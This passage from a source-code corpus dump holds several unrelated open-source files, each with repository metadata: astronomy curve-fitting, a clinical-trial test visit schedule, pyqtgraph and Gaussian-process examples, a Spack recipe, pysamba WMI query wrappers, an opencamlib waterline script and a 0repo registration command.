#out2, cov2 = curve_fit(g, X[:-2], Y[:-2], (0.13, n.max(Y)), YERR[:-2])# , maxfev = 5000)
#print out2
p.figure(0)
p.errorbar(X,Y, yerr = YERR, label='DATA')
xpl = n.arange(X.min(),X.max(),0.001)
#p.plot(xpl, g(xpl, out2[0],out2[1]), label='gaussian fit')
p.plot(xpl, g(xpl, out2[0],out2[1],out2[2]), label='gaussian fit')
p.ylabel(r'counts')
p.xlabel(r'$log_{10}(V_{max})/\bar{V}$')
p.grid()
p.xlim((-1, 1.3))
p.legend()
p.title(r'$\sigma=$'+str(n.round(out2[0],3))+r', $\mu=$'+str(n.round(out2[2],3))+r', $A=$'+str(n.round(out2[2],3)))
p.savefig(join(mockDir,"plots","delta-vmaxHistPerDeltaNormed-FIT-qso-z07.png"))
p.clf()
"""
g = lambda var, sig, A, mu : A *n.e**(- (var- mu)**2./ (2*sig**2.))
out2, cov2 = curve_fit(g, xx, counts, (0.1, n.max(counts), 0.), 2*counts**0.5 , maxfev = 500000000)
chi2 = n.sum((g(xx,out2[0], out2[1],out2[2]) - counts)**2. * counts**(-0.5) / (len(counts) - len(out2)))
params[jj]=out2
paramsErr[jj] = [cov2[0][0], cov2[1][1], cov2[2][2]]
p.errorbar(xx,counts,yerr = counts**0.5 , label=r'$\delta\in$'+str(n.round(bins[ok][jj],2))+', '+str(n.round(bins[ok][jj+1],2)))
xpl = n.arange(xx.min(),xx.max(),0.001)
p.plot(xpl, g(xpl, out2[0],out2[1],out2[2]), label='gaussian')
p.ylabel(r'counts')
p.xlabel(r'$log_{10}(V_{max})/\bar{V}$')
p.grid()
p.title(r'$\sigma=$'+str(n.round(out2[0],3))+r', $\mu=$'+str(n.round(out2[2],3))+r', $A=$'+str(n.round(out2[2],3)))
p.legend()
p.show()
hd = fits.open(join( mockDir,"Box_HAM_z0.701838_nbar1.000000e-04_LRG.DF.fits.gz"))
hd = fits.open(join( mockDir,"Box_HAM_z0.701838_nbar2.400000e-04_ELG.DF.fits.gz"))
"""
|
JohanComparat/nbody-npt-functions
|
bin/bin_DF/test_scripts/fit_density_field_to-tracers.py
|
Python
|
cc0-1.0
| 38,029
|
[
"Galaxy",
"Gaussian"
] |
3917de26e7fcbd31180080fa1ff74c441cea03f5a739dc3999a8bc86be120501
|
from collections import OrderedDict
from edc_visit_schedule.classes import (
VisitScheduleConfiguration, MembershipFormTuple, ScheduleTuple)
from ..models import TestVisit, TestVisit2, TestConsentWithMixin, TestAliquotType, TestPanel
from edc_testing.classes.entries import requisition_entries, crf_entries
class TestVisitSchedule(VisitScheduleConfiguration):
"""A visit schedule class for tests."""
name = 'Test Visit Schedule'
app_label = 'edc_testing'
panel_model = TestPanel
aliquot_type_model = TestAliquotType
membership_forms = OrderedDict({
'schedule-1': MembershipFormTuple('schedule-1', TestConsentWithMixin, True),
})
schedules = OrderedDict({
'schedule-1': ScheduleTuple('schedule-1', 'schedule-1', None, None),
})
visit_definitions = OrderedDict(
{'1000': {
'title': '1000',
'time_point': 0,
'base_interval': 0,
'base_interval_unit': 'D',
'window_lower_bound': 0,
'window_lower_bound_unit': 'D',
'window_upper_bound': 0,
'window_upper_bound_unit': 'D',
'grouping': 'group1',
'visit_tracking_model': TestVisit,
'schedule': 'schedule-1',
'instructions': None,
'requisitions': requisition_entries,
'entries': crf_entries},
'2000': {
'title': '2000',
'time_point': 1,
'base_interval': 0,
'base_interval_unit': 'D',
'window_lower_bound': 0,
'window_lower_bound_unit': 'D',
'window_upper_bound': 0,
'window_upper_bound_unit': 'D',
'grouping': 'group1',
'visit_tracking_model': TestVisit,
'schedule': 'schedule-1',
'instructions': None,
'requisitions': requisition_entries,
'entries': crf_entries},
'2000A': {
'title': '2000A',
'time_point': 0,
'base_interval': 0,
'base_interval_unit': 'D',
'window_lower_bound': 0,
'window_lower_bound_unit': 'D',
'window_upper_bound': 0,
'window_upper_bound_unit': 'D',
'grouping': 'group2',
'visit_tracking_model': TestVisit2,
'schedule': 'schedule-1',
'instructions': None,
'requisitions': requisition_entries,
'entries': crf_entries},
'2010A': {
'title': '2010A',
'time_point': 1,
'base_interval': 0,
'base_interval_unit': 'D',
'window_lower_bound': 0,
'window_lower_bound_unit': 'D',
'window_upper_bound': 0,
'window_upper_bound_unit': 'D',
'grouping': 'group2',
'visit_tracking_model': TestVisit2,
'schedule': 'schedule-1',
'instructions': None,
'requisitions': requisition_entries,
'entries': crf_entries},
'2020A': {
'title': '2020A',
'time_point': 2,
'base_interval': 0,
'base_interval_unit': 'D',
'window_lower_bound': 0,
'window_lower_bound_unit': 'D',
'window_upper_bound': 0,
'window_upper_bound_unit': 'D',
'grouping': 'group2',
'visit_tracking_model': TestVisit2,
'schedule': 'schedule-1',
'instructions': None,
'requisitions': requisition_entries,
'entries': crf_entries},
'2030A': {
'title': '2030A',
'time_point': 3,
'base_interval': 0,
'base_interval_unit': 'D',
'window_lower_bound': 0,
'window_lower_bound_unit': 'D',
'window_upper_bound': 0,
'window_upper_bound_unit': 'D',
'grouping': 'group2',
'visit_tracking_model': TestVisit2,
'schedule': 'schedule-1',
'instructions': None,
'requisitions': requisition_entries,
'entries': crf_entries},
},
)
|
botswana-harvard/edc-testing
|
edc_testing/classes/test_visit_schedule.py
|
Python
|
gpl-2.0
| 4,221
|
[
"VisIt"
] |
547a56ece9921e0f68eb4035353951e1279d97ec6ee6d944ab5ff01b49b0a0cc
|
# -*- coding: utf-8 -*-
"""
This example demonstrates a very basic use of flowcharts: filter data,
displaying both the input and output of the filter. The behavior of
he filter can be reprogrammed by the user.
Basic steps are:
- create a flowchart and two plots
- input noisy data to the flowchart
- flowchart connects data to the first plot, where it is displayed
- add a gaussian filter to lowpass the data, then display it in the second plot.
"""
import initExample ## Add path to library (just for examples; you do not need this)
from pyqtgraph.flowchart import Flowchart
from pyqtgraph.Qt import QtGui, QtCore
import pyqtgraph as pg
import numpy as np
import pyqtgraph.metaarray as metaarray
app = QtGui.QApplication([])
## Create main window with grid layout
win = QtGui.QMainWindow()
win.setWindowTitle('pyqtgraph example: Flowchart')
cw = QtGui.QWidget()
win.setCentralWidget(cw)
layout = QtGui.QGridLayout()
cw.setLayout(layout)
## Create flowchart, define input/output terminals
fc = Flowchart(terminals={
'dataIn': {'io': 'in'},
'dataOut': {'io': 'out'}
})
w = fc.widget()
## Add flowchart control panel to the main window
layout.addWidget(fc.widget(), 0, 0, 2, 1)
## Add two plot widgets
pw1 = pg.PlotWidget()
pw2 = pg.PlotWidget()
layout.addWidget(pw1, 0, 1)
layout.addWidget(pw2, 1, 1)
win.show()
## generate signal data to pass through the flowchart
data = np.random.normal(size=1000)
data[200:300] += 1
data += np.sin(np.linspace(0, 100, 1000))
data = metaarray.MetaArray(data, info=[{'name': 'Time', 'values': np.linspace(0, 1.0, len(data))}, {}])
## Feed data into the input terminal of the flowchart
fc.setInput(dataIn=data)
## populate the flowchart with a basic set of processing nodes.
## (usually we let the user do this)
plotList = {'Top Plot': pw1, 'Bottom Plot': pw2}
pw1Node = fc.createNode('PlotWidget', pos=(0, -150))
pw1Node.setPlotList(plotList)
pw1Node.setPlot(pw1)
pw2Node = fc.createNode('PlotWidget', pos=(150, -150))
pw2Node.setPlot(pw2)
pw2Node.setPlotList(plotList)
fNode = fc.createNode('GaussianFilter', pos=(0, 0))
fNode.ctrls['sigma'].setValue(5)
fc.connectTerminals(fc['dataIn'], fNode['In'])
fc.connectTerminals(fc['dataIn'], pw1Node['In'])
fc.connectTerminals(fNode['Out'], pw2Node['In'])
fc.connectTerminals(fNode['Out'], fc['dataOut'])
## Start Qt event loop unless running in interactive mode or using pyside.
if __name__ == '__main__':
import sys
if (sys.flags.interactive != 1) or not hasattr(QtCore, 'PYQT_VERSION'):
QtGui.QApplication.instance().exec_()
|
UpSea/thirdParty
|
pyqtgraph-0.9.10/examples/Flowchart.py
|
Python
|
mit
| 2,561
|
[
"Gaussian"
] |
d6bd786a4f42dd80d0e879d5a712750e2b47aaac02bf7c513887e960d5833a63
|
print "importing stuff..."
import numpy as np
import pdb
import matplotlib
matplotlib.use('Agg')
import matplotlib.pylab as plt
from scipy import special
from .datautils import step, spiral
from .context import aep
def run_regression_1D():
np.random.seed(42)
print "create dataset ..."
N = 200
X = np.random.rand(N, 1)
Y = np.sin(12 * X) + 0.5 * np.cos(25 * X) + np.random.randn(N, 1) * 0.2
# plt.plot(X, Y, 'kx', mew=2)
def plot(m):
xx = np.linspace(-0.5, 1.5, 100)[:, None]
mean, var = m.predict_f(xx)
zu = m.sgp_layer.zu
mean_u, var_u = m.predict_f(zu)
plt.figure()
plt.plot(X, Y, 'kx', mew=2)
plt.plot(xx, mean, 'b', lw=2)
plt.fill_between(
xx[:, 0],
mean[:, 0] - 2 * np.sqrt(var[:, 0]),
mean[:, 0] + 2 * np.sqrt(var[:, 0]),
color='blue', alpha=0.2)
plt.errorbar(zu, mean_u, yerr=2 * np.sqrt(var_u), fmt='ro')
plt.xlim(-0.1, 1.1)
# inference
print "create model and optimize ..."
M = 20
model = aep.SGPR(X, Y, M, lik='Gaussian')
model.optimise(method='L-BFGS-B', alpha=0.1, maxiter=50000)
plot(model)
plt.show()
def run_banana():
def gridParams():
mins = [-3.25, -2.85]
maxs = [3.65, 3.4]
nGrid = 50
xspaced = np.linspace(mins[0], maxs[0], nGrid)
yspaced = np.linspace(mins[1], maxs[1], nGrid)
xx, yy = np.meshgrid(xspaced, yspaced)
Xplot = np.vstack((xx.flatten(), yy.flatten())).T
return mins, maxs, xx, yy, Xplot
def plot(m):
col1 = '#0172B2'
col2 = '#CC6600'
mins, maxs, xx, yy, Xplot = gridParams()
mf, vf = m.predict_f(Xplot)
plt.figure()
plt.plot(
Xtrain[:, 0][Ytrain[:, 0] == 1],
Xtrain[:, 1][Ytrain[:, 0] == 1],
'o', color=col1, mew=0, alpha=0.5)
plt.plot(
Xtrain[:, 0][Ytrain[:, 0] == -1],
Xtrain[:, 1][Ytrain[:, 0] == -1],
'o', color=col2, mew=0, alpha=0.5)
zu = m.sgp_layer.zu
plt.plot(zu[:, 0], zu[:, 1], 'ro', mew=0, ms=4)
plt.contour(
xx, yy, mf.reshape(*xx.shape), [0],
colors='k', linewidths=1.8, zorder=100)
Xtrain = np.loadtxt(
'./examples/data/banana_X_train.txt', delimiter=',')
Ytrain = np.loadtxt(
'./examples/data/banana_Y_train.txt', delimiter=',').reshape(-1, 1)
Ytrain[np.where(Ytrain == 0)[0]] = -1
M = 50
model = aep.SGPR(Xtrain, Ytrain, M, lik='Probit')
model.optimise(method='L-BFGS-B', alpha=0.01, maxiter=2000)
plot(model)
model = aep.SGPR(Xtrain, Ytrain, M, lik='Probit')
model.optimise(method='L-BFGS-B', alpha=0.2, maxiter=2000)
plot(model)
model = aep.SGPR(Xtrain, Ytrain, M, lik='Probit')
model.optimise(method='L-BFGS-B', alpha=0.7, maxiter=2000)
plot(model)
plt.show()
def run_regression_1D_stoc():
np.random.seed(42)
print "create dataset ..."
N = 200
X = np.random.rand(N, 1)
Y = np.sin(12 * X) + 0.5 * np.cos(25 * X) + np.random.randn(N, 1) * 0.2
# plt.plot(X, Y, 'kx', mew=2)
def plot(m):
xx = np.linspace(-0.5, 1.5, 100)[:, None]
mean, var = m.predict_f(xx)
zu = m.sgp_layer.zu
mean_u, var_u = m.predict_f(zu)
plt.figure()
plt.plot(X, Y, 'kx', mew=2)
plt.plot(xx, mean, 'b', lw=2)
plt.fill_between(
xx[:, 0],
mean[:, 0] - 2 * np.sqrt(var[:, 0]),
mean[:, 0] + 2 * np.sqrt(var[:, 0]),
color='blue', alpha=0.2)
plt.errorbar(zu, mean_u, yerr=2 * np.sqrt(var_u), fmt='ro')
plt.xlim(-0.1, 1.1)
# inference
print "create model and optimize ..."
M = 20
model = aep.SGPR(X, Y, M, lik='Gaussian')
model.optimise(method='adam', alpha=0.1,
maxiter=100000, mb_size=M, adam_lr=0.001)
plot(model)
plt.show()
plt.savefig('/tmp/aep_gpr_1D_stoc.pdf')
def run_banana_stoc():
def gridParams():
mins = [-3.25, -2.85]
maxs = [3.65, 3.4]
nGrid = 50
xspaced = np.linspace(mins[0], maxs[0], nGrid)
yspaced = np.linspace(mins[1], maxs[1], nGrid)
xx, yy = np.meshgrid(xspaced, yspaced)
Xplot = np.vstack((xx.flatten(), yy.flatten())).T
return mins, maxs, xx, yy, Xplot
def plot(m):
col1 = '#0172B2'
col2 = '#CC6600'
mins, maxs, xx, yy, Xplot = gridParams()
mf, vf = m.predict_f(Xplot)
plt.figure()
plt.plot(
Xtrain[:, 0][Ytrain[:, 0] == 1],
Xtrain[:, 1][Ytrain[:, 0] == 1],
'o', color=col1, mew=0, alpha=0.5)
plt.plot(
Xtrain[:, 0][Ytrain[:, 0] == -1],
Xtrain[:, 1][Ytrain[:, 0] == -1],
'o', color=col2, mew=0, alpha=0.5)
zu = m.sgp_layer.zu
plt.plot(zu[:, 0], zu[:, 1], 'ro', mew=0, ms=4)
plt.contour(
xx, yy, mf.reshape(*xx.shape), [0],
colors='k', linewidths=1.8, zorder=100)
Xtrain = np.loadtxt(
'./examples/data/banana_X_train.txt', delimiter=',')
Ytrain = np.loadtxt(
'./examples/data/banana_Y_train.txt', delimiter=',').reshape(-1, 1)
Ytrain[np.where(Ytrain == 0)[0]] = -1
M = 30
model = aep.SGPR(Xtrain, Ytrain, M, lik='Probit')
model.optimise(method='adam', alpha=0.5,
maxiter=100000, mb_size=M, adam_lr=0.001)
plot(model)
plt.show()
plt.savefig('/tmp/aep_gpc_banana_stoc.pdf')
def run_step_1D():
np.random.seed(42)
print "create dataset ..."
N = 200
X = np.random.rand(N, 1) * 3 - 1.5
Y = step(X)
# plt.plot(X, Y, 'kx', mew=2)
def plot(m):
xx = np.linspace(-3, 3, 100)[:, None]
mean, var = m.predict_y(xx)
zu = m.sgp_layer.zu
mean_u, var_u = m.predict_f(zu)
plt.figure()
plt.plot(X, Y, 'kx', mew=2)
plt.plot(xx, mean, 'b', lw=2)
plt.fill_between(
xx[:, 0],
mean[:, 0] - 2 * np.sqrt(var[:, 0]),
mean[:, 0] + 2 * np.sqrt(var[:, 0]),
color='blue', alpha=0.2)
plt.errorbar(zu, mean_u, yerr=2 * np.sqrt(var_u), fmt='ro')
no_samples = 20
xx = np.linspace(-3, 3, 500)[:, None]
f_samples = m.sample_f(xx, no_samples)
for i in range(no_samples):
plt.plot(xx, f_samples[:, :, i], linewidth=0.5, alpha=0.5)
plt.xlim(-3, 3)
# inference
print "create model and optimize ..."
M = 20
model = aep.SGPR(X, Y, M, lik='Gaussian')
model.optimise(method='L-BFGS-B', alpha=0.9, maxiter=2000)
plot(model)
plt.savefig('/tmp/aep_gpr_step.pdf')
# plt.show()
def run_spiral():
np.random.seed(42)
def gridParams():
mins = [-1.2, -1.2]
maxs = [1.2, 1.2]
nGrid = 80
xspaced = np.linspace(mins[0], maxs[0], nGrid)
yspaced = np.linspace(mins[1], maxs[1], nGrid)
xx, yy = np.meshgrid(xspaced, yspaced)
Xplot = np.vstack((xx.flatten(), yy.flatten())).T
return mins, maxs, xx, yy, Xplot
def plot(m):
col1 = '#0172B2'
col2 = '#CC6600'
mins, maxs, xx, yy, Xplot = gridParams()
mf, vf = m.predict_f(Xplot)
plt.figure()
plt.plot(
Xtrain[:, 0][Ytrain[:, 0] == 1],
Xtrain[:, 1][Ytrain[:, 0] == 1],
'o', color=col1, mew=0, alpha=0.5)
plt.plot(
Xtrain[:, 0][Ytrain[:, 0] == -1],
Xtrain[:, 1][Ytrain[:, 0] == -1],
'o', color=col2, mew=0, alpha=0.5)
zu = m.sgp_layer.zu
plt.plot(zu[:, 0], zu[:, 1], 'ro', mew=0, ms=4)
plt.contour(xx, yy, mf.reshape(*xx.shape), [0],
colors='k', linewidths=1.8, zorder=100)
N = 100
M = 50
Xtrain, Ytrain = spiral(N)
Xtrain /= 6
model = aep.SGPR(Xtrain, Ytrain, M, lik='Probit')
model.set_fixed_params(['sf'])
model.optimise(method='L-BFGS-B', alpha=1, maxiter=2000)
plot(model)
plt.show()
def run_boston():
np.random.seed(100)
# We load the dataset
# datapath = '/scratch/tdb40/datasets/reg/bostonHousing/data/'
datapath = '/tmp/bostonHousing/data/'
datafile = datapath + 'data.txt'
data = np.loadtxt(datafile)
# We obtain the features and the targets
xindexfile = datapath + 'index_features.txt'
yindexfile = datapath + 'index_target.txt'
xindices = np.loadtxt(xindexfile, dtype=np.int)
yindex = np.loadtxt(yindexfile, dtype=np.int)
X = data[:, xindices]
y = data[:, yindex]
y = y.reshape([y.shape[0], 1])
train_ind_file = datapath + 'index_train_0.txt'
test_ind_file = datapath + 'index_test_0.txt'
index_train = np.loadtxt(train_ind_file, dtype=np.int)
index_test = np.loadtxt(test_ind_file, dtype=np.int)
X_train = X[index_train, :]
y_train = y[index_train, :]
X_test = X[index_test, :]
y_test = y[index_test, :]
mean_y_train = np.mean(y_train)
std_y_train = np.std(y_train)
y_train_normalized = (y_train - mean_y_train) / std_y_train
M = 50
alpha = 0.5
model = aep.SGPR(X_train, y_train_normalized, M, lik='Gaussian')
model.optimise(method='L-BFGS-B', alpha=alpha, maxiter=2000)
my, vy = model.predict_y(X_test)
my = std_y_train * my + mean_y_train
vy = std_y_train**2 * vy
# We compute the test RMSE
test_rmse = np.sqrt(np.mean((y_test - my)**2))
print 'RMSE %.3f' % test_rmse
# We compute the test log-likelihood
test_nll = np.mean(-0.5 * np.log(2 * np.pi * vy) -
0.5 * (y_test - my)**2 / vy)
print 'MLL %.3f' % test_nll
if __name__ == '__main__':
# run_regression_1D()
# run_banana()
run_step_1D()
# run_spiral()
# run_boston()
# run_regression_1D_stoc()
# run_banana_stoc()
|
thangbui/geepee
|
examples/gpr_aep_examples.py
|
Python
|
mit
| 9,893
|
[
"Gaussian"
] |
463028c21e88d0723a6b5634cd1a828018f5c61c3ee9ed4cf6c643f1ea171cf6
|
# Copyright 2013-2020 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class Shortbred(Package):
"""ShortBRED is a system for profiling protein families of interest at
very high specificity in shotgun meta'omic sequencing data."""
homepage = "https://huttenhower.sph.harvard.edu/shortbred"
url = "https://bitbucket.org/biobakery/shortbred/get/0.9.4.tar.gz"
version('0.9.4', sha256='a85e5609db79696d3f2d478408fc6abfeea7628de9f533c4e1e0ea3622b397ba')
depends_on('blast-plus@2.2.28:')
depends_on('cdhit@4.6:')
depends_on('muscle@3.8.31:')
depends_on('python@2.7.9:')
depends_on('py-biopython')
depends_on('usearch@6.0.307:')
def install(self, spec, prefix):
mkdirp(prefix.bin)
install('shortbred_identify.py', prefix.bin)
install('shortbred_quantify.py', prefix.bin)
install_tree('src', prefix.src)
def setup_run_environment(self, env):
env.prepend_path('PYTHONPATH', self.prefix)
|
iulian787/spack
|
var/spack/repos/builtin/packages/shortbred/package.py
|
Python
|
lgpl-2.1
| 1,129
|
[
"BLAST",
"Biopython"
] |
c20b8df5ab29576ade4947a75075014b7ca074b8be5369cdc66d6e237a10d26b
|
###########################################################################
#
# This program is part of Zenoss Core, an open source monitoring platform.
# Copyright (C) 2008-2010, Zenoss Inc.
#
# This program is free software; you can redistribute it and/or modify it
# under the terms of the GNU General Public License version 2, or (at your
# option) any later version, as published by the Free Software Foundation.
#
# For complete information please visit: http://www.zenoss.com/oss/
#
###########################################################################
from pysamba.library import *
from pysamba.wbem.wbem import *
from twisted.internet import defer
from pysamba.talloc import *
from pysamba.rpc.credentials import *
from pysamba.twisted.callback import Callback, WMIFailure
import Globals
from Products.ZenUtils.Driver import drive
import logging
logging.basicConfig()
log = logging.getLogger('zen.pysamba')
WBEM_S_TIMEDOUT = 0x40004L
WERR_BADFUNC = 1
# struct dcom_client_context *dcom_client_init(struct com_context *ctx,
# struct cli_credentials *credentials)
library.dcom_client_init.restype = c_void_p
library.dcom_client_init.argtypes = [POINTER(com_context), c_void_p]
library.com_init_ctx.restype = WERROR
class _WbemObject:
def __getattr__(self, name):
try:
return self.__dict__[name.lower()]
except Exception, ex:
raise AttributeError(name)
def convertArray(arr):
if not arr:
return None
result = []
arr = arr.contents
for i in range(arr.count):
result.append(arr.item[i])
return result
def convert(v, typeval):
if typeval == CIM_SINT8: return v.v_sint8
if typeval == CIM_UINT8: return v.v_uint8
if typeval == CIM_SINT16: return v.v_sint16
if typeval == CIM_UINT16: return v.v_uint16
if typeval == CIM_SINT32: return v.v_sint32
if typeval == CIM_UINT32: return v.v_uint32
if typeval == CIM_SINT64: return v.v_sint64
if typeval == CIM_UINT64: return v.v_sint64
if typeval == CIM_REAL32: return float(v.v_uint32)
if typeval == CIM_REAL64: return float(v.v_uint64)
if typeval == CIM_BOOLEAN: return bool(v.v_boolean)
if typeval in (CIM_STRING, CIM_DATETIME, CIM_REFERENCE):
return v.v_string
if typeval == CIM_CHAR16:
return v.v_string.decode('utf16')
if typeval == CIM_OBJECT:
return wbemInstanceToPython(v.v_object)
if typeval == CIM_ARR_SINT8: return convertArray(v.a_sint8)
if typeval == CIM_ARR_UINT8: return convertArray(v.a_uint8)
if typeval == CIM_ARR_SINT16: return convertArray(v.a_sint16)
if typeval == CIM_ARR_UINT16: return convertArray(v.a_uint16)
if typeval == CIM_ARR_SINT32: return convertArray(v.a_sint32)
if typeval == CIM_ARR_UINT32: return convertArray(v.a_uint32)
if typeval == CIM_ARR_SINT64: return convertArray(v.a_sint64)
if typeval == CIM_ARR_UINT64: return convertArray(v.a_uint64)
if typeval == CIM_ARR_REAL32: return convertArray(v.a_real32)
if typeval == CIM_ARR_REAL64: return convertArray(v.a_real64)
if typeval == CIM_ARR_BOOLEAN: return convertArray(v.a_boolean)
if typeval == CIM_ARR_STRING: return convertArray(v.a_string)
if typeval == CIM_ARR_DATETIME:
return convertArray(v.contents.a_datetime)
if typeval == CIM_ARR_REFERENCE:
return convertArray(v.contents.a_reference)
return "Unsupported"
def wbemInstanceToPython(obj):
klass = obj.contents.obj_class.contents
inst = obj.contents.instance.contents
result = _WbemObject()
result._class_name = klass.__CLASS
for j in range(klass.__PROPERTY_COUNT):
prop = klass.properties[j]
value = convert(inst.data[j], prop.desc.contents.cimtype & CIM_TYPEMASK)
if prop.name:
setattr(result, prop.name.lower(), value)
return result
def deferred(ctx):
cback = Callback()
ctx.contents.async.fn = cback.callback
return cback.deferred
wbemTimeoutInfinite = -1
class QueryResult(object):
def __init__(self, deviceId, ctx, pEnum):
self._deviceId = deviceId
self.ctx = ctx
talloc_increase_ref_count(self.ctx)
self.pEnum = pEnum
def close(self):
if self.ctx:
talloc_free(self.ctx)
self.ctx = None
def __del__(self):
self.close()
def fetchSome(self, timeoutMs=wbemTimeoutInfinite, chunkSize=10):
assert self.pEnum
def inner(driver):
count = uint32_t()
objs = (POINTER(WbemClassObject)*chunkSize)()
ctx = library.IEnumWbemClassObject_SmartNext_send(
self.pEnum, None, timeoutMs, chunkSize
)
yield deferred(ctx); driver.next()
result = library.IEnumWbemClassObject_SmartNext_recv(
ctx, self.ctx, objs, byref(count)
)
WERR_CHECK(result, self._deviceId, "Retrieve result data.")
result = []
for i in range(count.value):
result.append(wbemInstanceToPython(objs[i]))
talloc_free(objs[i])
driver.finish(result)
return drive(inner)
class Query(object):
def __init__(self):
self.ctx = POINTER(com_context)()
self.pWS = POINTER(IWbemServices)()
self._deviceId = None
def connect(self, eventContext, deviceId, hostname, creds, namespace="root\\cimv2"):
self._deviceId = deviceId
library.com_init_ctx.restype = WERROR
library.com_init_ctx(byref(self.ctx), eventContext)
cred = library.cli_credentials_init(self.ctx)
library.cli_credentials_set_conf(cred)
library.cli_credentials_parse_string(cred, creds, CRED_SPECIFIED)
library.dcom_client_init(self.ctx, cred)
def inner(driver):
flags = uint32_t()
flags.value = 0
ctx = library.WBEM_ConnectServer_send(
self.ctx, # com_ctx
None, # parent_ctx
hostname, # server
namespace, # namespace
None, # username
None, # password
None, # locale
flags.value, # flags
None, # authority
None) # wbem_ctx
yield deferred(ctx); driver.next()
result = library.WBEM_ConnectServer_recv(ctx, None, byref(self.pWS))
WERR_CHECK(result, self._deviceId, "Connect")
driver.finish(None)
return drive(inner)
def query(self, query):
assert self.pWS
def inner(driver):
qctx = None
try:
qctx = library.IWbemServices_ExecQuery_send_f(
self.pWS,
self.ctx,
"WQL",
query,
WBEM_FLAG_RETURN_IMMEDIATELY | WBEM_FLAG_ENSURE_LOCATABLE,
None)
yield deferred(qctx); driver.next()
pEnum = POINTER(IEnumWbemClassObject)()
result = library.IWbemServices_ExecQuery_recv(qctx,
byref(pEnum))
WERR_CHECK(result, self._deviceId, "ExecQuery")
ctx = library.IEnumWbemClassObject_Reset_send_f(pEnum, self.ctx)
yield deferred(ctx); driver.next()
result = library.IEnumWbemClassObject_Reset_recv(ctx);
WERR_CHECK(result, self._deviceId, "Reset result of WMI query.");
driver.finish(QueryResult(self._deviceId, self.ctx, pEnum))
except Exception, ex:
log.exception(ex)
raise
return drive(inner)
def notificationQuery(self, query):
assert self.pWS
def inner(driver):
qctx = None
pEnum = None
try:
qctx = library.IWbemServices_ExecNotificationQuery_send_f(
self.pWS,
self.ctx,
"WQL",
query,
WBEM_FLAG_RETURN_IMMEDIATELY | WBEM_FLAG_FORWARD_ONLY,
None)
yield deferred(qctx); driver.next()
pEnum = POINTER(IEnumWbemClassObject)()
result = library.IWbemServices_ExecNotificationQuery_recv(
qctx, byref(pEnum))
WERR_CHECK(result, self._deviceId, "ExecNotificationQuery")
driver.finish(QueryResult(self._deviceId, self.ctx, pEnum))
except Exception, ex:
if pEnum:
c = library.IUnknown_Release_send_f(pEnum, self.ctx)
yield deferred(c); driver.next()
result = library.IUnknown_Release_recv(self.ctx)
WERR_CHECK(result, self._deviceId, "Release")
log.exception(ex)
raise
return drive(inner)
def __del__(self):
self.close()
def close(self):
if self.ctx:
talloc_free(self.ctx)
self.ctx = None
|
NetNow/wmi-samba
|
pysamba/wbem/Query.py
|
Python
|
gpl-2.0
| 9,256
|
[
"VisIt"
] |
660165c068ac8883ed63d5240ceed0a4a728e4be0e0dc34aed7661bb91d2a377
|
import ocl
import camvtk
import time
import vtk
import datetime
import math
def waterline_time(zheights, diam, length,s,sampling):
t_total = time.time()
for zh in zheights:
cutter = ocl.BallCutter( diam , length )
wl = ocl.Waterline()
wl.setSTL(s)
wl.setCutter(cutter)
wl.setZ(zh)
wl.setSampling(sampling)
wl.setThreads(1)
wl.run()
cutter_loops = wl.getLoops()
for l in cutter_loops:
loops.append(l)
timeTotal = time.time()-t_total
print " ALL Waterlines done in ", timeTotal ," s"
return timeTotal
if __name__ == "__main__":
print ocl.version()
a = ocl.Point(0,1,0.3)
b = ocl.Point(1,0.5,0.3)
c = ocl.Point(0,0,0)
t = ocl.Triangle(b,c,a)
s = ocl.STLSurf()
s.addTriangle(t) # a one-triangle STLSurf
# alternatively, run on the tux model
stl = camvtk.STLSurf("../../stl/gnu_tux_mod.stl")
#myscreen.addActor(stl)
#stl.SetWireframe() # render tux as wireframe
#stl.SetSurface() # render tux as surface
#stl.SetColor(camvtk.cyan)
polydata = stl.src.GetOutput()
s = ocl.STLSurf()
camvtk.vtkPolyData2OCLSTL(polydata, s)
zheights=[-0.3, -0.2, -0.1, -0.05, 0.0, 0.05, 0.1, 0.15, 0.2, 0.25, 0.26, 0.27, 0.28, 0.29 ] # the z-coordinates for the waterlines
zheights=[-0.8, -0.7, -0.6, -0.5, -0.4, -0.3, -0.2, -0.1, -0.05, 0.0, 0.05, 0.1, 0.15, 0.2, 0.28 ]
zheights=[ -0.05, 0.0, 0.05, 0.1, 0.15, 0.2, 0.28]
zheights=[ 1.75145 ]
diam = 0.6 # run the thing for all these cutter diameters
length = 5
loops = []
cutter = ocl.CylCutter( 1 , 1 )
sampling=0.005
waterline_time(zheights, diam, length,s,sampling)
|
JohnyEngine/CNC
|
opencamlib/scripts/waterline/waterline_6_weave2.py
|
Python
|
apache-2.0
| 1,754
|
[
"VTK"
] |
87c433fb3a81a315cd28bfc17f88fd4c54e75990eeb338345623216d41ce1351
|
# Copyright (C) 2013, Thomas Leonard
# See the README file for details, or visit http://0install.net.
from __future__ import print_function
import os
from os.path import join
import json
from zeroinstall import support
from zeroinstall.support import basedir
from repo import cmd
def handle(args):
cmd.find_config()
config = cmd.load_config()
path = join(basedir.save_config_path('0install.net', '0repo'), 'repositories.json')
if os.path.exists(path):
with open(path, 'rb') as stream:
db = json.load(stream)
else:
db = {}
existing = db.get(config.REPOSITORY_BASE_URL, None)
entry = {'type': 'local', 'path': os.getcwd()}
if existing and existing == entry:
print("Already registered in {path} (no changes made):\n{base}: {json}".format(
path = path,
base = config.REPOSITORY_BASE_URL,
json = json.dumps(entry)))
return
db[config.REPOSITORY_BASE_URL] = entry
with open(path + '.new', 'wb') as stream:
json.dump(db, stream)
support.portable_rename(path + '.new', path)
if existing:
print("Updated entry in {path} to:".format(path = path))
else:
print("Created new entry in {path}:".format(path = path))
print("{base}: {json}".format(base = config.REPOSITORY_BASE_URL, json = json.dumps(entry)))
|
bastianeicher/0repo
|
repo/cmd/register.py
|
Python
|
lgpl-2.1
| 1,246
|
[
"VisIt"
] |
66f914aa3e8d08c186da569e288e4577918abebe3fd93abf94798514c2dc08be
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# --- BEGIN_HEADER ---
#
# serverfile - [insert a few words of module description on this line]
# Copyright (C) 2003-2009 The MiG Project lead by Brian Vinter
#
# This file is part of MiG.
#
# MiG is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# MiG is distributed in the hope that it will be useful,
